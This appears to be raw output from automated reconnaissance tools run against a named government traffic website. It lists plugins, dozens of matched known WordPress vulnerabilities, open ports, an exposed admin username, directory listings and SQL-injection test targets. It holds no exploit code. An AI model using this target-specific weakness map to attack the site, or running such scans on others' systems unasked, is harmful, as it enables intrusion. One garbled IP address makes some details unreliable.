- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/changelog.txt
- [+] Name: itro-popup
- | Latest version: 5.0.2
- | Last updated: 2017-07-02T08:03:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/changelog.txt
- [+] Name: meteor-slides
- | Latest version: 1.5.6
- | Last updated: 2017-06-09T20:39:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/changelog.txt
- [+] Name: transito_grafico
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/changelog.txt
- [+] Name: wp-super-cache
- | Latest version: 1.6.2
- | Last updated: 2018-06-19T09:49:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/changelog.txt
- [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
- [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
- Reference: https://wpvulndb.com/vulnerabilities/6623
- Reference: http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
- Reference: http://wordpress.org/support/topic/pwn3d
- Reference: http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6624
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6625
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6626
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6627
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6628
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6629
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/7889
- Reference: http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
- [i] Fixed in: 1.4.3
- [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8197
- Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- [i] Fixed in: 1.4.5
- [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
- Reference: https://wpvulndb.com/vulnerabilities/8198
- Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- [i] Fixed in: 1.4.5
- [+] Finished: Wed Aug 8 10:57:20 2018
- [+] Elapsed time: 00:21:43
- [+] Requests made: 416
- [+] Memory used: 103.109 MB
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.transitonacional.gob.ni
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.transitonacional.gob.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] Robots.txt retrieved
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.57 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns1.rhostbh.com. (162.159.24.66) AS13335 Cloudflare Inc United States
- ns2.rhostbh.com. (162.159.25.91) AS13335 Cloudflare Inc United States
- [+] MX Records
- 0 (50.87.39.915) AS46606 Unified Layer United States
- [+] Host Records (A)
- www.transitonacional.gob.niHTTP: (50-87-39-91.unifiedlayer.com) (50.87.39.915) AS46606 Unified Layer United States
- [+] TXT Records
- "v=spf1 a mx ptr include:rhostbh.com ?all"
- [+] DNS Map: https://dnsdumpster.com/static/map/transitonacional.gob.ni.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- No hosts found
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [+] Found 8 fuzzable URLs
- http://www.transitonacional.gob.ni//?page_id=864
- [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- #######################################################################################################################################
- [i] The remote host tried to redirect to: http://www.transitonacional.gob.ni/
- [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N] >Y
- [+] URL: http://www.transitonacional.gob.ni/
- [+] Started: Wed Aug 8 10:08:01 2018
- [+] Interesting header: SERVER: nginx/1.14.0
- [+] Interesting header: WP-SUPER-CACHE: Served supercache file from PHP
- [+] Interesting header: X-POWERED-BY: PHP/5.2.17
- [+] robots.txt available under: http://www.transitonacional.gob.ni/robots.txt [HTTP 200]
- [+] XML-RPC Interface available under: http://www.transitonacional.gob.ni/xmlrpc.php [HTTP 405]
- [+] API exposed: http://www.transitonacional.gob.ni/wp-json/ [HTTP 200]
- [+] Found an RSS Feed: http://www.transitonacional.gob.ni/feed [HTTP 200]
- [!] Detected 1 user from RSS feed:
- +-------+
- | Name |
- +-------+
- | admin |
- +-------+
- [!] Full Path Disclosure (FPD) in 'http://www.transitonacional.gob.ni/wp-includes/rss-functions.php':
- [!] Upload directory has directory listing enabled: http://www.transitonacional.gob.ni/wp-content/uploads/
- [!] Includes directory has directory listing enabled: http://www.transitonacional.gob.ni/wp-includes/
- [+] Enumerating WordPress version ...
- [!] The WordPress 'http://www.transitonacional.gob.ni/readme.html' file exists exposing a version number
- [+] WordPress version 4.4.2 (Released on 2016-02-02) identified from advanced fingerprinting, readme, stylesheets numbers
- [!] 47 vulnerabilities identified from the version number
- [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
- Reference: https://wpvulndb.com/vulnerabilities/8473
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
- [i] Fixed in: 4.5
- [!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
- Reference: https://wpvulndb.com/vulnerabilities/8474
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
- [i] Fixed in: 4.5
- [!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8475
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
- [i] Fixed in: 4.5
- [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8488
- Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
- Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
- Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
- [i] Fixed in: 4.5.2
- [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
- Reference: https://wpvulndb.com/vulnerabilities/8489
- Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
- Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
- Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
- Reference: http://avlidienbrunn.com/wp_some_loader.php
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
- [i] Fixed in: 4.4.3
- [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
- Reference: https://wpvulndb.com/vulnerabilities/8518
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
- Reference: https://wpvulndb.com/vulnerabilities/8519
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
- Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
- Reference: https://wpvulndb.com/vulnerabilities/8520
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
- Reference: https://wpvulndb.com/vulnerabilities/8615
- Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
- Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
- Reference: http://seclists.org/fulldisclosure/2016/Sep/6
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
- [i] Fixed in: 4.4.5
- [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
- Reference: https://wpvulndb.com/vulnerabilities/8616
- Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
- [i] Fixed in: 4.4.5
- [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
- Reference: https://wpvulndb.com/vulnerabilities/8714
- Reference: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
- Reference: https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
- Reference: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
- Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
- Reference: https://wpvulndb.com/vulnerabilities/8716
- Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
- Reference: https://wpvulndb.com/vulnerabilities/8718
- Reference: https://www.mehmetince.net/low-severity-wordpress/
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
- [i] Fixed in: 4.4.6
- [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
- Reference: https://wpvulndb.com/vulnerabilities/8719
- Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
- Reference: https://wpvulndb.com/vulnerabilities/8720
- Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
- Reference: https://wpvulndb.com/vulnerabilities/8721
- Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
- Reference: https://wpvulndb.com/vulnerabilities/8729
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8730
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
- Reference: https://wpvulndb.com/vulnerabilities/8731
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
- Reference: https://wpvulndb.com/vulnerabilities/8765
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
- Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
- Reference: http://seclists.org/oss-sec/2017/q1/563
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
- Reference: https://wpvulndb.com/vulnerabilities/8766
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- Reference: https://wpvulndb.com/vulnerabilities/8768
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
- Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
- Reference: https://wpvulndb.com/vulnerabilities/8770
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
- Reference: http://seclists.org/oss-sec/2017/q1/562
- Reference: https://hackerone.com/reports/153093
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
- Reference: https://wpvulndb.com/vulnerabilities/8807
- Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- Reference: https://core.trac.wordpress.org/ticket/25239
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
- [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
- Reference: https://wpvulndb.com/vulnerabilities/8815
- Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
- Reference: https://wpvulndb.com/vulnerabilities/8816
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
- Reference: https://wpvulndb.com/vulnerabilities/8817
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8818
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
- Reference: https://wpvulndb.com/vulnerabilities/8819
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
- Reference: https://hackerone.com/reports/203515
- Reference: https://hackerone.com/reports/203515
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8820
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8905
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
- Reference: https://wpvulndb.com/vulnerabilities/8906
- Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://wpvulndb.com/vulnerabilities/8905
- [i] Fixed in: 4.7.5
- [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
- Reference: https://wpvulndb.com/vulnerabilities/8910
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41398
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- Reference: https://wpvulndb.com/vulnerabilities/8911
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41457
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- Reference: https://wpvulndb.com/vulnerabilities/8913
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41448
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- Reference: https://wpvulndb.com/vulnerabilities/8914
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41395
- Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
- [i] Fixed in: 4.4.11
- [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
- Reference: https://wpvulndb.com/vulnerabilities/8941
- Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
- Reference: https://twitter.com/ircmaxell/status/923662170092638208
- Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
- [i] Fixed in: 4.4.12
- [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
- Reference: https://wpvulndb.com/vulnerabilities/8966
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8967
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8968
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
- Reference: https://wpvulndb.com/vulnerabilities/8969
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/9006
- Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
- Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/ticket/42720
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
- [i] Fixed in: 4.4.14
- [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
- Reference: https://wpvulndb.com/vulnerabilities/9021
- Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
- Reference: https://github.com/quitten/doser.py
- Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
- [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
- Reference: https://wpvulndb.com/vulnerabilities/9053
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
- [i] Fixed in: 4.4.15
- [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
- Reference: https://wpvulndb.com/vulnerabilities/9054
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
- [i] Fixed in: 4.4.15
- [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
- Reference: https://wpvulndb.com/vulnerabilities/9055
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
- [i] Fixed in: 4.4.15
- [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
- Reference: https://wpvulndb.com/vulnerabilities/9100
- Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
- Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
- Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
- Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
